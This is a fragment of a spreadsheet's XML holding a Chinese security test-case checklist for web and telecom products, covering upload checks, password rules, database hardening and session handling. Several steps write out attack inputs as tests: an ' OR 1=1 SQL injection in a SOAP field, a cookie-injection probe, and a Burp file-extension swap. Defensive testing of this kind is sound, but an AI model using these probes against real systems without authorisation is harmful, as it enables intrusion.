2.启动burpsuite代理，配置对GET和POST方法进行拦截；
3.上传合法的文件，例如将脚本文件*.jsp修改为*.jpg文件，然后上传文件；
4.使用burpsuite拦截的并将文件名修改为*.jsp文件，继续上传；
5.如果上传成功说明文件类型仅在客户端判断，存在问题。
备注：上传文件时应该在客户端和服务器端同时判断文件类型</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.将一个较大的文件扩展名修改为允许的上传类型，例如*.jsp，然后上传，查看是否能上传成功；
2.如果对上传的文件大小无限制或者超过提示的大小限制，说明存在问题。
备注：具体分上传功能场景，比如一般头像上传一般不超过1M，附件上传一般不超过500M，如果无任何限制，说明存在问题。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>本条适用于上传功能对普通用户或者普通管理员开放的情况：
1.找到上传文件测试点；
2.按要求上传文件，例如上传test.jpg；
3.文件上传到服务器后，保存的位置在Web目录下，并且文件名称没有改变，说明存在问题。
备注：文件上传到服务器后，如果需要保存在Web目录，需要对文件进行重命名，例如201421399002633.jpg(可以使用时间+复杂的随机值)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>个人敏感信息包括：种族或人种，政治观点，宗教或哲学信仰，健康状况，性取向、工会成员、犯罪记录、遗传信息等。
1.使用Web代理工具burpsuite拦截系统返回的个人信息
2.检查拦截的消息传输时是否使用安全协议HTTPS
以下信息建议也重点关注：数据丢失会对业务造成直接快速的严重影响，如认证凭证（口令、动态令牌卡）、政府发布的身份标识（身份证、社保号、护照等）、金融交易凭证标识（信用卡号、银行帐号）。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对于Web应用，访问重要事务/敏感信息时，往服务器端传递用户名和口令时，采用HTTPS安全协议（也就是带服务器端证书的SSL）。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>方法一：
1.登录系统，查询个人信息，系统信息等机密内容；
2.使用WEB代理工具burpsuit拦截返回的信息；
3.检查返回信息当中，是否包含超出查询范围的敏感信息。
方法二：
1.登录系统，查询个人信息，系统信息等机密内容；
2.使用浏览器，查看源文件，并搜索相关敏感信息。
注：除个人信息或机密信息外，需要检查系统中存在机密数据配置相关的界面检查。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查找Web应用程序存在口令输入框的界面/页面；
2.在口令输入框中输入任意字符串；
3.选择并复制口令输入框中的字符串；
备注：请测试所有口令输入框。
备注2：本测试用例主要为了防止口令在界面存在的位置被窃取，请测试人员理解分析本产品口令在客户端存在的场景，设计窃取口令测试用例。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.使用burpsuite拦截请求消息
2.在burpsuite中，修改WSDL定义的参数数据。测试者可以利用 ' OR 1=1 注入，使其在执行SQL或XPath
例如：&lt;userid&gt;myuser&lt;/userid&gt; &lt;password&gt;' OR 1=1&lt;/password&gt; 
备注：详细SQL注入方法可参考WEB SQL注入的用例</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.打开APPSCN，创建扫描任务，并选择WEB应用扫描
2.输出应用的网址信息，以及应用系统的用户名与密码
3.选择扫描策略、并配置相关扫描参数
4.开始对系统进行扫描
5.分析扫描结果</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.运行WSDigger，点击Next按钮进入WSDL页面
2.在WSDL输入框中输入接口的WSDL地址http://PortalIP:Port/Path/Interface?wsdl 
3.点击Get Methods按钮，获取接口方法 
4.在左侧的接口方法树形框中选择要测试的方法
5.选择菜单Attacks-&gt;Select Attack Type，弹出攻击类型对话框，在对话框左侧的选择列表框中选择所有的测试项
6.点击Start，观察返回结果，根据WSDL接口定义的返回事件判断是否成功</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.判断网站根目录是否存在crossdomain.xml文件，如果不存在结束检查；
2.如果存在crossdomain.xml文件，查看&lt;allow-access-from domain="*"/&gt;中domain值是否为星号。
备注：domain属性应根据最小化原则按需设置，仅允许可信任的来源跨域请求本域内容，例如&lt;allow-access-from domain="*.huawei.com"/&gt;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检查产品配套的组网设计文档，是否提供符合以下要求的网络拓扑图：
按照三层模型或者其他模型设计的具备安全性的拓扑图，图中必须标明所有网络设备的逻辑连接关系，网络物理连线图（包括无线网络连接）。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查产品配套的组网设计文档，是否有合理的安全域划分。
2.至少包括非信任区、DMZ区、OM区和业务核心区（信任区）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用Ping方式，测试步骤举例：
1、假设用户面的网元的地址为10.10.10.2，网元的网管的地址为10.10.11.2，这两个地址在不同的网段；
2、在被测网元的同一个网段内，找一台测试机，设置测试机网卡的IP地址为10.10.10.3网关的地址为10.10.10.2，通过测试机可以Ping通用户面的网元的IP地址；
3、在测试机上Ping 10.10.11.2，如果能够ping通，则说明网元隔离失败，如果Ping不通，则说管理流和生产流隔离了。
备注：如果测试环境不具备，则只能通过检查组典型网设计文档与安装配置指南，是否管理平面和用户平面进行隔离。对于Web应用，必须保证管理portal和用户portal的服务部署在不同的机器上，或者部署在同一台机器但端口不一样。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检查产品配套的组网设计文档，不同的安全域之间是否配置状态防火墙来实现相互间的访问控制。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检查产品的描述文档（如：产品的概述文档），是否对产品安全特性进行描述。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检查产品配套文档是否包含《安全技术白皮书》</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检查产品配套文档是否包含安全配置/加固指南</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>红线</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、使用最新版本的fortify、coverity扫描产品提供的源码包</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>扫描得分不低于65分，对于扣分项有对应的分析说明</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.启动windows或linux环境下的任务管理器，查看运行mysql服务的账号；
2.检查这个账户是否为系统管理员账号。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>首先通过任务管理器启动mysql服务，命令行进入mysql安装目录下的bin目录，执行以下命令：
windows：mysql -u用户名 -p密码
linux：./mysql -u用户名 -p密码
1.在mysql命令行下执行“show variables like 'datadir'”得到数据库安装路径。
2.数据库目录不能在系统分区（Windows系统不能在C盘，Linux不能在/目录下）。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>首先通过任务管理器启动mysql服务，命令行进入mysql安装目录下的bin目录，执行以下命令：
windows：mysql -u用户名 -p密码
linux：./mysql -u用户名 -p密码
1.在mysql命令行下执行“show variables like 'version'”，查看mysql版本。
2.如果版本低于5.0，则迁移mysql到较高版本。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>首先通过任务管理器启动mysql服务，命令行进入mysql安装目录下的bin目录，执行以下命令：
windows：mysql -u用户名 -p密码
linux：./mysql -u用户名 -p密码
1.检查已有数据库用户的密码复杂度是否符合红线要求（或产品资料中是否存在用户密码复杂度要求的说明），要求具备一定复杂度；
2.使用insert/update语句往mysql数据库user表中插入/修改一条用户记录，设置弱复杂度的密码，看能否插入成功。例如：
Insert into user(host,user,password) values ('%','user123','123456')
口令复杂度至少满足如下要求：
1、口令长度至少6个字符（特权用户至少8个字符）；
2、口令必须包含如下至少两种字符的组合:
      －至少一个小写字母；
      －至少一个大写字母；
      －至少一个数字；
      －至少一个特殊字符：`~!@#$%^&amp;*()-_=+\|[{}];:'",&lt;.&gt;/?  和空格
3、口令不能和帐号或者帐号的倒写一样；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>首先通过任务管理器启动mysql服务，命令行进入mysql安装目录下的bin目录，执行以下命令：
windows：mysql -u用户名 -p密码
linux：./mysql -u用户名 -p密码
1.在mysql命令行下执行“select user, password from mysql.user where length(password) = 0 or password is null;”。
2.查询结果应该为空。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>首先通过任务管理器启动mysql服务，命令行进入mysql安装目录下的bin目录，执行以下命令：
windows：mysql -u用户名 -p密码
linux：./mysql -u用户名 -p密码
1.在mysql命令行下执行“select user, host from mysql.user where (Select_priv = 'Y') or (Insert_priv = 'Y') or (Update_priv = 'Y') or (Delete_priv = 'Y') or (Create_priv = 'Y') or (Drop_priv = 'Y');”
2.查询结果应该为数据库管理员；
3.在mysql命令行下执行“select user, host from mysql.db where db = 'mysql' and ( (Select_priv = 'Y') or (Insert_priv = 'Y') or (Update_priv = 'Y') or (Delete_priv = 'Y') or (Create_priv = 'Y') or (Drop_priv = 'Y'));”
4.查询结果应该为数据库管理员或者为空。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>如果系统存在创建程序帐号的界面，则该界面，创建一个已经存在的程序帐号。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>访问创建操作员帐号的界面，创建一个已经存在的操作员帐号。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、检查所有类型的帐号是否可配置；
2、查找出所有不可配置的帐号，使用搜索工具查找源代码</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>以操作员帐号登录，访问修改口令的界面，为当前登录用户设置新口令（比如Ab_12)。
注：常见操作员（人机接口或可远程访问的机机接口之间）-
BS架构Web操作员（举例：营业厅）、操作系统操作员、数据库操作员（物理数据库/内存数据库）、用于接口认证/登录操作员（举例MML/Webservice）、CS架构安装/维护工具登录操作员（举例ideploy、故障库、I2000网管）等
注：常见操作员口令修改场景-
1.BS和CS架构、OS、DB、接口登录客户端修改
2.安装时涉及到得口令输入界面
3.涉及口令修改的工具/脚本
4....
注：开源软件/第三方软件单独处理
说明：以上说明全文涉及口令测试的用例都适用</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>访问修改口令的界面，为当前登录用户设置新口令（比如Ab_13)。
注：常见最终用户口令修改场景（人机接口或可远程访问的机机接口之间）-
Web管理端（举例开户/修改密码）、手机终端/客服终端用户portal、通过接口消息（举例开户/修改密码）、脚本批量修改等
说明：以上说明全文涉及口令测试的用例都适用</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>如果存在程序帐号，访问程序账户的修改口令的界面，为某程序帐号设置新口令（比如Ab_13)。
备注：程序帐号的定义请参考“术语解释”工作表。
注：常见程序账号（人机接口或可远程访问的机机接口之间）-
实现SFTP自动传输文件的功能的sftp帐号、模块间连接使用账号、运行业务系统功能的服务器帐号等
注：常见程序账号口令修改场景-
登录服务器修改，Web管理端（举例设置口令-非配置口令）、通过接口消息、脚本批量修改等
说明：以上说明全文涉及口令测试的用例都适用</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>以操作员帐号登录，访问修改口令的界面，为当前登录用户设置新口令。尝试设置以下口令：
ABCABCD
abcabcd
1234123
@#$%^&amp;*(只包含特殊字符的组合)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、以最终用户帐号登录，访问修改口令页面；
2、启动WebScarab代理，配置对GET和POST方法进行拦截；
3、在浏览器上设置代理服务器为127.0.0.1，端口为8008；
4、设置新口令，并提交；
5、查看WebScarab拦截的修改口令的请求中是否包含帐号信息。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、以操作员帐号登录，访问修改口令页面；
2、启动WebScarab代理，配置对GET和POST方法进行拦截；
3、在浏览器上设置代理服务器为127.0.0.1，端口为8008；
4、设置新口令，并提交；
5、查看WebScarab拦截的修改口令的请求中是否包含帐号信息。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>假设用户名是：root，分别尝试设置root的口令为以下口令：
root
toor
要分别测试操作员账号、最终用户账号、程序账号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、使用peach进行SSL/TLS扫描，命令：./peach pits/Net/ssl.xml
2、观察被测设备CPU、系统、连接状态
注意事项：套件需要根据产品定制化；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、系统所有人机帐号和机机帐号是否记录在产品资料中。
2、开源及第三方软件的所有人机帐号和机机帐号是否记录在资料里。
3、用户是否可以修改自己帐号的口令。
4、系统是否给具有帐号管理权限的管理员提供创建帐号的功能，单用户场景除外
5、系统是否给具有帐号管理权限的管理员提供查看、编辑系统中的帐号属性的功能（如：重置口令、锁定解锁、设定有效期等）
6、系统是否给帐号管理员提供删除帐号的功能，单用户场景除外
7、帐号删除后，与该帐号的权限相关的所有属性是否同时使之失效，不可重用</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、管理员禁止重置自己的口令，只能修改自己的口令，且修改时需要验证旧口令；管理重置其他用户口令的场景不需要验证口令；
2、（可选）使用交互式命令行参数修改口令。
3、旧口令输入错误时，查看系统响应。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、在登录界面或者修改口令界面中，查看是否明文回显输入的口令
2、使用交互式命令行参数时，查看是否明文回显输入的口令
3、禁止在程序的错误提示信息中明文显示口令
4、禁止在调试信息中明文显示口令
5、禁止使用查看历史命令（如：方向健或history）的方式显示口令</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、口令框内的信息拷出或剪切到其他位置（如：文本文件，网络设备等）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、是否对系统管理的人机接口提供认证机制
2、是否对系统管理的跨信任域的机机接口提供认证机制
3、对于设备外部的物理接口，如果接入该物理接口后可以对设备进行管理，是否对该物理接口提供接入认证机制
4、认证方法是否是自行设计
5、在使用SSL协议进行身份认证时，检查客户端验证服务端的身份步骤</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、使用客户端的验证结果来验证用户身份
2、对上传/下载/删除/创建目录等操作权限控制是否在服务端进行控制
3、对于赋权权限的判断是否仅在前台做了灰化，而没有在后台做校验。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、系统认证时，是否有验证码或错误次数、时间限制
2、当产品使用验证码时，是否先对验证码进行验证，再验证帐号/口令的正确性
3、当重复输入错误口令次数(如3次）超过阈值时，返回的错误信息是否泄露系统敏感信息，</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、Web server是否对访问的请求进行过滤
2、通过主控的外置LMT的用户解锁命令构造的URL执行解锁。
3不登录WEB界面即可获取系统配置信息
4、刀片服务器WEB不经认证通过http（非https）协议访问下载conf和xml文件。
5、管理web的所有url是否经过认证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、是否使用C标准库函数random()、rand()生成随机数用于安全用途
2、是否使用Java的java.util.Random类生成随机数用于安全用途
3、随机数种子的设置是否每次调用随机数接口时都设置种子
4、使用java.security.SecureRandom()产生随机数时，是否每次都设置了相同的种子，
5、生成随机数长度是否超过24个字符（或192bits）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、成功认证后是否更换会话标识
2、二次认证后是否更换会话标识</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、token是否使用安全随机数生成
2、token长度是否超过24个字符（或192bits）
3、token最长有效期是否小于或等于会话有效期
4、B/S架构中，token是否存在于HTTP header或页面隐藏域中</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、会话中的重要信息（如用户名、用户ID、用户权限等）是否存储在服务器端
2、对于sessionid等必须在客户端存储的信息，服务器端是否同样存储一份用于校验</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、界面是否提供退出按钮
2、退出后是否通知服务端清除会话</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、查看会话超时时间
2、使用自动发起请求的机制阻止session超时</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、是否自行设计的密码算法或使用未公开算法细节的算法；
2、是否自行对标准密码算法进行改造并使用；
3、是否使用自行定义的通过变形/字符移位/替换等方式执行的数据转换；
4、是否使用编码的方式（如Base64编码）实现数据加密目的；
5、是否使用差错控制编码（如奇偶校验、CRC）实现完整性校验。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、查看系统中开放的端口
2、通信矩阵中不再使用的端口记录
3、通信矩阵中记录的端口用途</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.访问操作员管理界面，检查是否能够指定操作员帐号的有效开始时间和有效结束时间。
2.如果系统存在创建程序帐号的界面，则创建一个新的程序帐号，检查是否能够指定程序帐号的有效开始时间和有效结束时间。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检查认证信息是否能够被客户端关闭，例如，删除登录消息体中的“valid=server”或“valid=1”，则系统不再进行服务器端认证，则说明存在问题。
B/S应用：
1.启动浏览器，打开被测系统的登录页面；
2.启动WebScarab/burpsuite_v1.4.01代理，配置对GET和POST方法进行拦截；
3.在浏览器上设置代理服务器为127.0.0.1，端口为8008；
4.在步骤1打开的登录界面中输入认证信息，提交登录；
5.逐条检查WebScarab/burpsuite_v1.4.01拦截的消息，如果有用户名密码验证码以外的字段，则跟开发咨询该字段的用途，并尝试删除或修改该字段，检查是否影响服务器的认证。
C/S应用：
1.启动C/S客户端登录页面；
2.启动softProxy代理，在“设置-&gt;基本设置”中配置被测系统的目标IP和Port；在“设置-&gt;高级设置”中配置“消息拦截规则”为“拦截所有消息”（ps：熟练掌握工具并极熟悉被测系统消息的测试人员可以选择按关键字拦截，并配置合适的关键字）；
3.点击softProxy“操作-&gt;启动”，开始拦截消息；
4.在步骤1打开的登录界面中输入正确的认证信息，提交登录；
5.在softProxy拦截的“消息详情”中，如果有用户名密码验证码以外的字段，则跟开发咨询该字段的用途，并尝试删除或修改该字段，检查是否影响服务器的认证。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.使用管理员账户创建一个新用户。
2.命令行登陆：使用新创建的用户登陆系统，查看系统是否给出要求修改密码提示，尝试可否不修改密码而键入其他命令行。
3.web登陆：使用新创建的用户登陆系统，查看系统是否跳转到修改密码页面，尝试可否不修改密码而通过url直接键入其他功能页面地址直接绕过密码修改进行系统操作。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用户仅可以修改自身帐号的口令，哪怕是不同级别的用户，高级别的也不能修改低级别的口令，（超级管理员除外）：
1.找到用户修改口令的测试点；
2.尝试修改口令，并使用BURP工具抓取修改口令过程；
3.观察数据包中是否有特征字符例如 admin，root等；
4.常识修改特征字符串为超级管理员或其它用户，看是否可以修改成功；
5.设计上的问题，系统如果本身设计的就允许当前用户修改其它用户的口令，则有问题。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、使用浏览器登陆web系统，尝试使用基本功能，比如：查看用户状态。
2、打开burpsuite等代理工具，开启HTTP请求拦截。
3、再次尝试查看用户状态，并在burpsuite拦截到的请求中，修改sessionID的大小写。
4、发送请求，看能否返回与第1步相同的页面。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.梳理产品提供IP地址的部分，识别不需要和公网进行交互的部分；
2.检查不需要和公网交换的IP地址，是否设置为内网IP地址。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查运行软件程序的帐号是不是root、administrator或supervisor等高权限帐号，例如：linux系统下执行命令ps -ef，可以查看程序运行账号。
2.检查运行软件程序的帐号所在的用户组是否是sys、root、adminstrator、super等超级管理员组，例如：linux系统下执行命令groups &lt;user&gt;，可以查看用户所属的用户组。
3.检查运行软件程序的帐号的权限。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在产品的安装目录中运行命令： find ./ -perm +0007
说明：find ./ -perm +0007 命令将返回当前目录及子目录下其他用户可以读或写或执行的文件或目录。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查发布产品的配套补丁。
2.检查产品发布后的补丁更新计划。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用于加密通过非信任网络传输的数据的密钥，不能在程序中硬编码，应提供密钥管理或密钥协商的机制：
1.检查是否存在用于加密的密钥是否提供密钥管理的机制或密钥协商的机制。
2.使用命令行验证密钥的管理机制或密钥协商机制。
3.通过Source Insight搜索代码，例如：搜索VOS_Cmp函数,在搜索结果中查看有无密钥的硬编码。
4.传输加密密钥不能硬编码在代码中，需要提供密钥管理的机制或密钥协商的机制。
备注：这里的密钥对应的是对称加密的密钥。非对称加密算法的公钥没有安全问题。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、使用有日志删除权限的用户登陆设备后台，删除产品记录日志的文件。
2、登陆设备，执行需要记录日志的操作，例如：登陆、修改账号信息、下发配置等。
3、再次登陆设备后台，看日志文件是否自动生成，且记录了上述操作。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、在PC1上使用已有账号登陆系统；
2、更改PC1 ip地址；
3、将PC2 ip地址改为PC1原始ip地址；
4、在PC2上直接访问系统内部链接，看能绕过认证，访问成功。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、登录系统。
2、配置WebScarab进行http get和post请求拦截。
3、请求Web页面。
4、在WebScarab中查看请求报文。
5、检查请求消息中是否携带了与用户身份相关的数据。如果有，修改身份信息。如果服务器端以修改后的身份进行操作，则说明存在漏洞，完成测试。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对于B/S应用：
1.以管理员登录系统，访问添加用户的界面，拷贝对应URL，然后点击“注销/退出”按钮或菜单；
2.以普通操作员（未分配用户管理权限）登录系统，在浏览器URL地址栏中粘贴步骤1获得的URL，并按回车；
3.查看系统的响应，是否将当前用户踢出系统，重定向到登录页面，并且记录安全日志。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.安装firefox中的cookies manager插件，并打开；
2.找到需要检查的站点，可以通过搜索域名或IP进行过滤，并双击进入“Edit Cookie”；
3.查看httponly是否为yes，如果不是说明存在问题；
4.查看发送条件是否为“仅限加密连接”，如果不是说明存在问题。
备注：
1.secure属性
   当设置为true时，表示创建的Cookie会被以安全的形式向服务器传输，也就是只能在HTTPS连接中被浏览器传递到服务器端进行会话验证，如果是HTTP连接则不会传递该信息，所以不会被窃取到Cookie的具体内容。
2.HttpOnly属性
   如果在Cookie中设置了“HttpOnly”属性，那么通过程序（JS脚本、Applet等）将无法读取到Cookie信息，这样能一定程度防止XSS攻击。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、查找形如“.asp?id=xx”类的带参数的URL。
2、去掉“?id=xx”查看页面显示是否正常，如果不正常，说明参数在数据传递中是直接起作用的。
3、清空浏览器地址栏，输入“javascript:alert(document.cookie="id="+escape("xx"));”，按Enter键后弹出一个对话框，内容是“id=xx”，然后用步骤2的URL刷新页面，如果显示正常，说明应用是用Request("id")这种方式获取数据的。
4、重复上面的步骤，将常规SQL注入中的判断语句带入上面的URL：“javascript:alert(document.cookie="id="+escape("xx and 1=1"));”和“javascript:alert(document.cookie="id="+escape("xx and 1=2"));”。
和常规SQL注入一样，如果分别返回正常和不正常页面，则说明该应用存在注入漏洞，并可以进行cookie注入。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1. 登陆后台Web服务器的操作系统；
2. 以cd命令进入可以通过Web方式访问的目录（比如tomcat服务器的$home/webapps目录，jboss服务器的$home/jboss/server/default/deploy目录）；
3. 用find命令，查找是否存在以下备份文件和临时文件，则测试不通过；
4. 如果业务需要使用以下文件类型，文件名称必须使用安全的随机命名规则。
find ./ -name "*.bak"
find ./ -name "*.BAK"
find ./ -name "*.old"
find ./ -name "*.OLD"
find ./ -name "*.zip"
find ./ -name "*.ZIP"
find ./ -name "*.gz "
find ./ -name "*.rar"
find ./ -name "*.tar"
find ./ -name "*.temp"
find ./ -name "*.save"
find ./ -name "*.backup"
find ./ -name "*.orig"
find ./ -name "*.000"
find ./ -name "*.dwt"
find ./ -name "*.swp"
备注：这些文件可能会泄漏源代码或者敏感信息。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查看重要的配置文件如web.xml、config.xml；
2.使用浏览器构造URL，如http://127.0.0.1/config/config.xml，检查是否可以直接访问这些配置文件；
3.如果可以正常访问，说明存在问题。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.访问一个不存在的URL，如http://127.0.0.1/xxxxx/xxx.jsp；
2.访问存在的目录，如http://127.0.0.1/conf；
3.访问带有特殊符号的URL，如下：
  http://127.0.0.1/login.do?page=1#
  http://127.0.0.1/login.do?page=1%
  http://127.0.0.1/login.do?page=1'
  http://127.0.0.1/login.do?page=1"
  http://127.0.0.1/login.do?page=1~
4.在浏览器地址栏中依次输入这些带有特殊字符的URL并回车；
5.返回404、403、500等错误时，如果泄露版本等敏感信息说明存在问题。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、 在正常的URL的参数中添加特殊字符：% * ; ’ ?等，添加特殊字符后的URL为：
http://www.exmaple.com/page.xxx?name= value%
http://www.exmaple.com/page.xxx?name= value*
http://www.exmaple.com/page.xxx?name= value;
http://www.exmaple.com/page.xxx?name= value?
http://www.exmaple.com/page.xxx?name= value’
2、 在浏览器地址栏中依次输入这些带有特殊字符的URL并回车；
3、 观察返回结果。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、返回的页面中没有敏感信息（比如：详细的类名、方法，SQL语句，物理路径等）。
2、页面可能接受多个参数，需对每个参数都进行测试。
3、POST情况下的参数也需要测试。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.$ORACLE_HOME/bin目录下的文件必须属于oracle用户、dba组，且权限小于或等于755。
2.$ORACLE_HOME目录下的文件必须属于oracle用户、dba组，且权限小于或等于750(不包括$ORACLE_HOME/bin中的文件和externaljob.ora)。
3.$ORACLE_HOME/network/admin目录下的文件必须属于oracle用户、dba组，且权限小于或等于640。
4.控制文件、数据文件、联机日志文件必须属于oracle用户、dba组，且权限均需要设置为660(如果使用ASM管理，则不需要设置权限) 。
5.归档日志文件必须属于oracle用户、dba组，且权限需要小于等于750。
6.密码文件必须属于oracle用户、dba组，且权限需要设置为640。
7.pfile、spfile文件必须属于oracle用户、dba组，且权限需要设置为640。
8.user_dump_dest、background_dump_dest、core_dump_dest指向的目录必须属于oracle用户、dba组，且权限需要设置为640。
9.diagnostic_dest指向的目录必须属于oracle用户、dba组，且权限需要设置为660。
10.ifile必须属于oracle用户、dba组，且权限需要设置为750。
11.$ORACLE_HOME/bin/tkprof文件必须属于root用户、dba组，且权限需要设置为750。
12.externaljob.ora文件必须属于root用户、dba组，且权限需要设置为640。
13.ASM磁盘必须属于oracle/grid用户、dba/oinstall组，且权限需要设置为660。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>返回的页面中没有敏感信息。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_020109_089</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>089 注销时清除（会话）Cookie，以及会话清除在服务器端进行</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_02010601_013</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>013 对DWR提交的参数进行输入校验</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_086</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>086 越权访问重要功能</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>block</t>
  </si>
  <si>
    <t>1、产品通常的应用场景中是否可以明确能登陆系统的用户范围（例如：只向企业内部或校内提供服务的系统，或只对内网开放的维护接口等）。
2、使用管理员账号登陆系统。
3、进入系统配置-访问控制页面，看是否能配置限制登陆的用户ip地址或地址段。
4、使用配置ip地址段之外的pc访问系统，看能否登陆成功。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、检查设备是否存在能对系统进行管理的物理接口（如串口、USB接口、管理网口等）；
2、如果存在，检查这些物理接口是否是外部可见的；
3、如果外部可见，访问这些接口，检查是否有接入认证机制；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>红线 高</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.向法务部获取敏感国家数据保留时限及相关保存条件
2.查看对应云服务获取的用户通信数据是否符合法务部提供的要求</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
